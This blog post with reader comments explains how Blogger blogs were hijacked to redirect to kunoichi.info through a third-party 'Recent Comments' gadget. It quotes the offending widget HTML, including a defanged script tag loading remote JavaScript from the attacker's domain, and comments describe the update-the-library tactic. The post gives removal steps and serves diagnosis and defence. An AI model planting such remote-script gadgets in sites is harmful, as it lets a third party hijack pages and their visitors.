Skip to main content

Blogger Blogs Redirecting To "kunoichi . info"

In the latest round of blog hijacks, from misbehaving or miswritten accessory gadgets, we have reports this month in Blogger Help Forum: Something Is Broken about blogs redirecting to "kunoichi . info".
My Blogger site, xxxxxxx . blogspot . com, with over 8 years of blog posts archived, has been redirected without my permission, to "kunoichi . info". I see my blog for a few seconds before it goes to the new site.

If we use a text only browser, such as an HTTP trace utility, the offending code is directly visible. Here's an example, taken from the latest forum problem report (and rigourously redacted).

<div class='widget HTML' id='HTML2'>
<h2 class='title'>Recent Comments</h2>
<div class='widget-content'>
<script style="text/javascript" src="http : // kunoichi . info / blogger _ buster / comments.js"></script><script style="text/javascript">var a_rc=5;var m_rc=true;var n_rc=true;var o_rc=100;</script><script src="http : // xxxxxxx . blogspot . com /feeds/comments/default?alt=json-in-script&callback=showrecentcomments"></script>

So far, identification and removal, of the problem code, seems to be straightforward - just access the "Page Elements" wizard (Classic Blogger GUI) or the "Layout" menu wizard (New Blogger GUI), find the offending gadget, and remove it. As always, you are advised to clear cache and restart the browser, after removal and before testing.

>> Top

Comments

Andrejs said…
Thanks. Just ran into this issue. In case someone runs into a similar problem. Couldn't find it in the Layout GUI for a while. Then stumbled across it when I edited the comments gadget.
Jennifer said…
Hey, thanks. My blog is dormant as far as new posts, but I do go back to it to look at older things now and then. My BF discovered it had the Kunoichi redirect problem, and I found your post by Googling "blog hijacked to kunoichi.info".

Your solution worked, and all is now well. What I would like to know is, how did the code get in there in the first place?

In any case, thanks for the solution!
Jennifer
Nitecruzr said…
Jennifer,

You probably deleted a very useful sounding gadget - typically the problem will be in "Recent Comments" / "Recent Posts" or maybe "Daily Calendar". When initially installed, the gadget will work just fine.

What the hacker did is write the code, that you installed on your blog, so it references his personal code library. After his hacked gadgets had been installed by thousands of blog owners, the hacker updated his code, and it now redirects to "kunoichi . info".

In a similar case, the hacker is advising people to read his blog. The article on his blog instructs people to remove the "bad" gadgets, and get updated gadgets from his personal library - not Google hosted.

In effect, this guy is using the Google code library to advertise his personal expertise as a hacker.

We have had this exploit twice, in the past. The first time, it took us like 6 months before we noticed a pattern - and we had hundreds of problem reports in the forums, when the gadgets matured. The second time, we knew what to look for - and this time, we were ready for the attack.

http://blogging.nitecruzr.net/search/label/Blog%20Hijack%20-%202010
Jennifer said…
Ah, okay, that makes sense.

In my case, it was "Recent Comments," so I had wondered if someone had left the code in a comment, which was then displayed on the page, causing the problem.

Your explanation makes more sense, though - for the text of a comment to be able to hijack a blog would be a pretty big security hole!

In any case, it's gone and now I know it won't happen again. Thanks!
Cindee said…
Thank you SO much for the fix. I had no idea what to do. You responded so quickly too. Thanks again!!
Sid Fadnis said…
Thanks a lot I just recovered my blog using ur help
Globus said…
good post, which globus found useful. thanks.
Nitecruzr said…
Globus,

You will be at the end of a very long line.

Popular posts from this blog

Adding A Link To Your Blog Post

Occasionally, you see a very odd, cryptic complaint I just added a link in my blog, but the link vanished! No, it wasn't your imagination.

Embedded Comments And Main Page View

The option to display comments, embedded below the post, was made a blog option relatively recently. This was a long requested feature - and many bloggers added it to their blogs, as soon as the option was presented to us. Some blog owners like this feature so much, that they request it to be visible when the blog is opened, in main page view. I would like all comments, and the comment form, to be shown underneath the relevant post, automatically, for everyone to read without clicking on the number of comments link. And this is not how embedded comments work.

What's The URL Of My Blog?

We see the plea for help, periodically I need the URL of my blog, so I can give it to my friends. Help! Who's buried in Grant's Tomb, after all? No Chuck, be polite. OK, OK. The title of this blog is "The Real Blogger Status", and the title of this post is "What's The URL Of My Blog?".